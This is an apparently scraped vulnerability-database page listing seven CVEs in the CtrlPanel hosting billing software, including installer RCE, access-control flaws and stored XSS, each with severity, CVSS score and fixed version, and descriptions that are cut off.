Ctrlpanel-Gg Panel vulnerabilities
7 known vulnerabilities affecting ctrlpanel-gg/panel.
Total CVEs
7
CISA KEV
0
Public exploits
1
Exploited in wild
1
Severity breakdown
CRITICAL1HIGH3MEDIUM3
Vulnerabilities
Page 1 of 1
CVE-2026-34234P1CRITICALCVSS 10.0ExploitedPoCfixed in 1.2.02026-05-19
CVE-2026-34234 [CRITICAL] CWE-78 CVE-2026-34234: CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the we
CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the web-based installer (public/installer/index.php) is vulnerable to unauthenticated Remote Code Execution (RCE) because it performs the install.lock check only after including and executing form handler files, leaving installer endpoints reachable on alr
nvd
CVE-2026-34358P3HIGHCVSS 8.1fixed in 1.2.02026-05-19
CVE-2026-34358 [HIGH] CWE-284 CVE-2026-34358: CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contains a
CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contains a broken access control vulnerability where multiple admin controllers enforce permission checks on form display methods but omit equivalent checks on the corresponding write methods, allowing any authenticated user to bypass RBAC via direct POST/PATCH r
nvd
CVE-2026-34241P3HIGHCVSS 8.7fixed in 1.2.02026-05-19
CVE-2026-34241 [HIGH] CWE-79 CVE-2026-34241: CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a
CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the ticket reply notification system. Unsanitized reply content ($newmessage) is stored directly in database notification payloads and later rendered unescaped via Blade's {!! !!} syntax in the recipient'
nvd
CVE-2026-34216P3MEDIUMCVSS 6.6fixed in 1.2.02026-05-19
CVE-2026-34216 [MEDIUM] CWE-470 CVE-2026-34216: CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the ad
CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the admin settings update endpoint accepted a fully qualified class name directly from user-supplied request input and used it for dynamic static method calls and object instantiation without any allowlist validation, allowing for authenticated Remote Code
nvd
CVE-2026-34233P3MEDIUMCVSS 6.5fixed in 1.2.02026-05-19
CVE-2026-34233 [MEDIUM] CWE-284 CVE-2026-34233: CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, multip
CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, multiple admin controllers expose DataTable endpoints without authorization checks, allowing any authenticated user to access sensitive administrative data that should be restricted to administrators only. The affected admin controllers define datatable() m
nvd
CVE-2025-25203P3HIGHCVSS 8.1fixed in 1.02025-02-11
CVE-2025-25203 [HIGH] CWE-79 CVE-2025-25203: CtrlPanel is open-source billing software for hosting providers. Prior to version 1.0, a Cross-Site
CtrlPanel is open-source billing software for hosting providers. Prior to version 1.0, a Cross-Site Scripting (XSS) vulnerability exists in the `TicketsController` and `Moderation/TicketsController` due to insufficient input validation on the `priority` field during ticket creation and unsafe rendering of this field in the moderator panel. Version 1.0 c
nvd
CVE-2026-34246P4MEDIUMCVSS 4.8fixed in 1.2.02026-05-19
CVE-2026-34246 [MEDIUM] CWE-80 CVE-2026-34246: CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a
CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability exists in the admin role management interface. In app/Http/Controllers/Admin/RoleController.php, the datatable() method interpolates $role->name and $role->color directly into a element's HTML and style at
nvd